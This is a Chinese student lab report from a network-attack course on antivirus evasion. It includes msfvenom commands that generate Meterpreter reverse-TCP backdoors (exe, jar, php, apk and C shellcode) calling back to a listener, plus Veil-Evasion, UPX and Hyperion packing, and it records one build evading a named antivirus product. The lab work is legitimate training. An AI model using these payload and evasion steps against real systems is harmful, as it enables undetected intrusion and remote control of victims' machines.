Exp3 免杀原理与实践

一、实践内容概述

1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程

2.通过组合应用各种技术实现恶意代码免杀

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

4.基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码的检测

    • 简单来说一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。
    • AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。
  • 启发式恶意软件检测

    • 如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那我们就把它当成一个恶意软件。
    • 优点:可以检测0-day恶意软件;具有一定通用性。
    • 缺点:实时监控系统行为,开销稍多;没有基于特征码的精确度高。
  • 基于行为的恶意软件检测

    • 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式。

(2)免杀是做什么?

一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。

(3)免杀的基本方法有哪些?

  • 改变特征码

    • 如果你手里只有EXE:加壳--压缩壳、加密壳。
    • 有shellcode(像Meterpreter):用encode进行编码;基于payload重新编译生成可执行文件。
    • 有源代码:用其他语言进行重写再编译(veil-evasion)。
  • 改变行为

    • 通讯方式:尽量使用反弹式连接;使用隧道技术;加密通讯数据。
    • 操作模式:基于内存操作;减少对系统的修改;加入混淆作用的正常功能代码。
  • 非常规方法

    • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
    • 使用社工类攻击,诱骗目标关闭AV软件。
    • 纯手工打造一个恶意软件。

二、实践具体步骤

(一)任务一: 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,使用shellcode编程,加壳工具

1.正确使用msf编码器

  • 输入指令 # msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.19.128 LPORT=5306 -f exe > msf5306.exe生成exe文件

  • Windows自带杀毒软件发现了它

  • 关闭防火墙和实时保护,使用VirusTotal进行扫描

  • 开启电脑管家

  • 编码多次仍被检测出来的原因:

    • shikata_ga_nai总会有解码(decoder stub)部分需要加入的exe中,只要盯住这部分就可以了。
    • 模板是msfvenom用来生成最终Exe的那个壳子exe文件,msfvenom会以固定的模板生成exe,所有它生成的exe,如果使用默认参数或模板,也有一定的固定特征。如果使用msfvenom免杀,就要使用原生的模板。

2.msfvenom生成如jar之类的其他文件

  • 输入指令msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x > 5306_java_backdoor.jar生成java后门程序

  • 扫描结果如下

  • 开启电脑管家

  • 输入指令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_php_backdoor.php生成php后门程序

  • 扫描结果如下

  • 开启电脑管家

  • 输入指令msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 x> 5306_android_backdoor.apk生成Android后门程序

  • 扫描结果如下

  • 开启电脑管家


3.使用veil-evasion生成后门程序及检测

  • 打开热点
  • git clone https://www.github.com/Veil-Framework/Veil-Evasion.git从github上进行clone下载
  • 下载完成后,安装软件配置包,依次输入指令ls,cd Veil-Evasion,ls,cd setup,./setup.sh
  • 询问是否继续安装时,输入Y
  • 跳出python for windows安装界面,一路点击Next,Finish,Accept

  • 出现Setup-Ruby1.8.7-p371时,全选中复选框,点击Install

  • 输入list

  • 选择6) c/meterpreter/rev_tcp

  • 依次输入命令set LHOST 192.168.19.128(Kali的IP),set LPORT 5306options

  • 输入指令generate生成文件,输入payload名字veil53061

  • 依图中所示路径,找到了veil53061.exe,小小地开心一哈~

  • 用virustotal检测一下,还是被发现了

  • 开启电脑管家

  • 注:下次进入veil,需先进入到有Veil-Evasion的文件夹,然后输入指令./Veil-Evasion.py


4.C语言调用Shellcode

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=5306 -f c用C语言生成一段shellcode

  • touch 20165306buf.c创建一个文件,将刚刚生成的unsigned char buf[]复制到其中

  • 输入指令i686-w64-mingw32-g++ 20165306buf.c -o 20165306buf.exe生成可执行文件

  • 用virustotal检测如下

  • 开启电脑管家


5.加壳


- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。 - 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。 - 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。 - 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。 - MSF的编码器使用类似方法,对shellcode进行再编码。 - 从技术上分壳分为: - 压缩壳:减少应用体积,如ASPack,UPX
- 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
- 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
  • 压缩壳(UPX)

20165306buf.exe加个壳得到5306_upxed.exe

用virustotal检测如下

  • 开启电脑管家

  • 加密壳(Hyperion)

5306_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/目录中

进入目录/usr/share/windows-binaries/hyperion/

输入指令wine hyperion.exe -v 5306_upxed.exe 5306_upxed_Hyperion.exe加壳

被Windows自带杀软发现

用virustotal检测如下

  • 开启电脑管家


(二)任务二:通过组合应用各种技术实现恶意代码免杀

  • C语言调用shellcode+加密壳+压缩壳

  • 使用msfconsole回连

  • 电脑管家13.3.20237.212没有发现


(三)任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

受害者:win7虚拟机

杀毒软件:电脑管家13.3.20237.212

  • 20165306buf加密壳,再压缩壳,生成5306buf_Hyperion_upxed.exe

  • 将Win7虚拟机和Kali ping通,在Win7中设置共享文件夹,安装ncat

  • 使用msfconsole回连

  • Win7的电脑管家没有发现

  • 20165306buf.exe加压缩壳生成20165306buf_upxed.exe,室友电脑帮忙扫描


三、实验中遇到的问题

问题1:无法获得锁

  • 原因:其他进程占用了自己要使用的资源

  • 解决:ps aux | grep "apt-get" 列出所有占用apt资源的进程,sudo kill 进程id结束其他进程,然后输入指令sudo rm /var/cache/apt/archives/locksudo rm /var/lib/dpkg/lock

参考解决方法

问题2:远端意外挂断了

  • 原因:也许是校园网的问题

问题3:无法打开加过压缩壳的文件

  • 解决:重新把5306_upxed.exe拷贝到指定目录下,确保拷贝成功后,再执行下面的指令

问题4:win7和kali ping不通

  • 解决:如下图改成桥接模式

成功ping通

四、实验体会

1.时刻加强防范意识

2.懂得借力≠完全依靠他人。

装veil时我参考了许多同学的博客,装了一下午还是失败,本来想拷同学的虚拟机,但出于和自己较劲的心态,终于找到了适合自己的教程并安装成功,有小小的成就感。继续加油呀~

3.认真阅读实验要求,多看多问多思考,不要想当然。感谢学长的耐心指导!

  • 修改主机名!

20165306 Exp3 免杀原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  2. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  3. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  6. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践 一.实验说明 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),vei ...

随机推荐

  1. turtlebot3 ubuntu mate 实现vnc连接

    tuutlebot3 ubuntu mate 实现vnc连接 摘要: 在turtlebot3 安装的nbuntu mate系统实验过. 实现内容 x11vnc 安装 x11vnc自动启动 vnc分辩率 ...

  2. box-sizing:border-boxing的使用

    <div class="box"></div> .box { margin-top: 200px; margin-left: 200px; backgrou ...

  3. mysql 获取昨天数据 utc时间

    # yzj邀请昨日数据 SELECT s.id, s.create_at, ch.id, ch.code AS channel, c.id , c.code AS custom, so.id, so. ...

  4. Oauth2.0安全问题浅谈

    大家如果对Oauth还不是很了解可以先看下这篇文章https://www.cnblogs.com/maoxiaolv/p/5838680.html 我这篇博客主要是总结一下安全测试过程中遇到Oauth ...

  5. JS对象、构造器函数和原型对象之间的关系

    一.基本概念 1.对象:属性和方法的集合,即变量和函数的封装.每个对象都有一个__proto__属性,指向这个对象的构造函数的原型对象. 2.构造器函数:用于创建对象的函数,通过new关键字生成对象. ...

  6. Linux 常用命令,处理端口和Tomcat,mysql

    查看端口占用 1.lsof -i:端口号 2.netstat -tunlp|grep 端口号 都可以查看指定端口被哪个进程占用的情况 kill -9 进程号    强制结束进程 启动 1.使用 ser ...

  7. java.lang.IllegalAccessError: org.apache.commons.dbcp.DelegatingPreparedStatement.isClosed()Z

    做spring和mybaits整合时出现的错误,让这个问题困扰了一早上,通过查资料终于把这个问题解决了 具体问题描述: java.lang.IllegalAccessError: org.apache ...

  8. 接口自动化测试持续集成--SoapUI安装

    实际使用: 接口自动化测试持续集成框架:maven+SoapUI+jenkins 1.SoapUI安装文件下载5.1.2 http://pan.baidu.com/s/1c17dJLu安装步骤非常简单 ...

  9. ASP.NET MVC案例教程(七)

      前言 写这篇文章的目的,是想总结一些东西,以帮助朋友们更好的使用这个框架.但是,我又不像把官方列举的哪些优势.功能翻译过来列举在这里.所以,我想干脆我就纯从个人观点上对这个框架评论一下吧.说的不好 ...

  10. 畅捷通T+12.2升级时发生的错误及处理方法图解

    前言:最近处理一个客户单位的财务数据,需要从2004年的U820版本的数据升级到畅捷通T+12.2版本.经查,该升级先要将原数据升级到T6,再从T6升级到畅捷通T+12.2版本.U820升级到T6很简 ...